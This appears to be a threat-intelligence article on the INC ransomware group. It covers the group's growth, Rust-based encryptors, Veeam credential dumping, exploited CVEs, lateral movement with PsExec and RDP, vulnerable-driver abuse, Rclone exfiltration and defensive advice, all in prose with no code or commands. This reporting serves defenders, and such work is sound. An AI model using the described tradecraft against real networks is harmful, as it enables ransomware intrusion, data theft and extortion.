Cybersecurity researchers have observed the rapid evolution of the INC ransomware group, transforming from a nascent ransomware-as-a-service (RaaS) operation into one of the most prolific cybercrime entities by 2026. Since August 2023, INC has claimed over 830 victims, with a significant majority targeting organizations in the United States across critical sectors like legal services, manufacturing, construction, technology, and healthcare.
The disruption of major ransomware operations, notably LockBit and BlackCat, created a fertile ground for INC to expand its reach. Affiliates seeking new avenues for their illicit activities have migrated to alternative ransomware platforms, including INC, contributing to its accelerated growth. This influx has bolstered INC’s capabilities and reach, making it a prominent threat in the current cybersecurity landscape.
INC Ransomware: A Growing Threat Landscape
INC’s technical advancements have played a crucial role in its ascendance. The group has rewritten its Windows and Linux/ESXi encryptors in Rust, a modern programming language known for its performance and security features. This strategic move facilitates easier cross-platform development and significantly enhances resistance to reverse engineering attempts, making it harder for security professionals to analyze and counteract the malware.
Furthermore, INC has introduced an updated credential dumper capable of targeting newer Veeam backup deployments that utilize salted DPAPI credential encryption. This allows attackers to more effectively pilfer credentials from critical backup systems, thereby broadening their access and potential for disruption. The group’s adaptable infrastructure and evolving toolkit underscore its commitment to maintaining a sophisticated and persistent threat.
The proliferation of INC’s ransomware variants has also been evident in the cybercrime underground. The sale of its Windows and Linux versions in May 2024 has led to the emergence of related ransomware families, such as Lynx and Sinobi, which exhibit significant code overlap with INC’s original strain. This indicates a potential for code sharing and collaboration within the cybercriminal ecosystem, further complicating efforts to track and mitigate these evolving threats.
INC ransomware affiliates are known for their diverse range of tools and techniques. In recent campaigns, they have consistently targeted unpatched edge devices for initial access, a common entry point for many cyberattacks. After gaining a foothold, they often target Veeam backup servers to dump credentials, which are then used to move laterally through victim networks. For this lateral movement, they employ a mix of Living-off-the-Land binaries (LOLBins)—legitimate system tools used for malicious purposes—and commercial Remote Monitoring and Management (RMM) tools, demonstrating a flexible and opportunistic approach to network infiltration.
The INC Attack Chain: A Detailed Look
The double extortion strategy employed by INC involves a multi-stage attack chain. Organizations are initially compromised through various methods, including sophisticated spear-phishing campaigns, the acquisition of stolen account credentials from illicit marketplaces, and the exploitation of vulnerabilities in publicly accessible applications. Notable vulnerabilities exploited include those in Citrix Netscaler (CVE-2023-3519 and CVE-2025-5777), Fortinet EMS (CVE-2023-48788), and SimpleHelp (CVE-2024-57727).
Once initial access is secured, the attackers focus on extracting sensitive credentials from the compromised environment. They leverage LOLBins like Remote Desktop Protocol (RDP) and PsExec to facilitate lateral movement across the network, seeking out valuable data and critical systems. The “Bring Your Own Vulnerable Driver” (BYOVD) technique, using drivers like filwfp.sys, filnk.sys, and fildds.sys, is also employed to disable or impair system defenses, weakening the victim’s security posture.
For command-and-control (C2) infrastructure, INC affiliates utilize a range of tools such as Cobalt Strike, AnyDesk, ScreenConnect, and TeamViewer. These legitimate remote access tools are often misused for malicious C2 communication, making them difficult to distinguish from normal network traffic. Data exfiltration is typically carried out using Rclone after sensitive information is staged and compressed into password-protected archives. This stage is critical for the double extortion aspect, as stolen data is often held ransom or leaked if the primary ransom payment is not met.
Finally, the encryption phase commences using the INC encryptor. The ransomware employs techniques like multithreading and partial encryption to accelerate the data locking process. The payload features a command-line interface, granting operators granular control during hands-on deployments. Notably, when executed with the “–esxi” argument, the ransomware attempts to shut down virtual machines, potentially causing significant operational downtime and increasing pressure on victims to comply with ransom demands.
The success of ransomware groups like INC highlights that advanced tradecraft or bespoke tooling may not always be necessary for achieving significant scale and impact. By efficiently leveraging widely known techniques and readily available tools, these groups can consistently generate victims across diverse geographies and sectors. Data from ZeroFox indicates that INC ransomware emerged as the fourth most prominent ransomware group in Q1 2026, responsible for over 120 incidents during that period, following other notable groups like Qilin, Akira, and The Gentlemen.
INC’s continued strengthening of its ransomware operations through Rust-based payload rewrites and continuous toolkit enhancements poses an ongoing threat. The group’s strategic targeting of industries such as healthcare, legal services, professional services, manufacturing, and construction is particularly effective, as operational downtime in these sectors creates immense financial pressure to pay ransoms. This threat is amplified by the interconnected nature of these industries, where reliance on uninterrupted operations and supply chains increases the risk of collateral exposure across vendor networks and downstream partners in the event of a breach.
Moving forward, cybersecurity professionals must remain vigilant, focusing on patching unpatched vulnerabilities, strengthening credential management practices, and implementing robust backup and recovery solutions. The ongoing evolution of INC and similar ransomware groups underscores the need for continuous adaptation and proactive defense strategies in the face of an ever-changing threat landscape.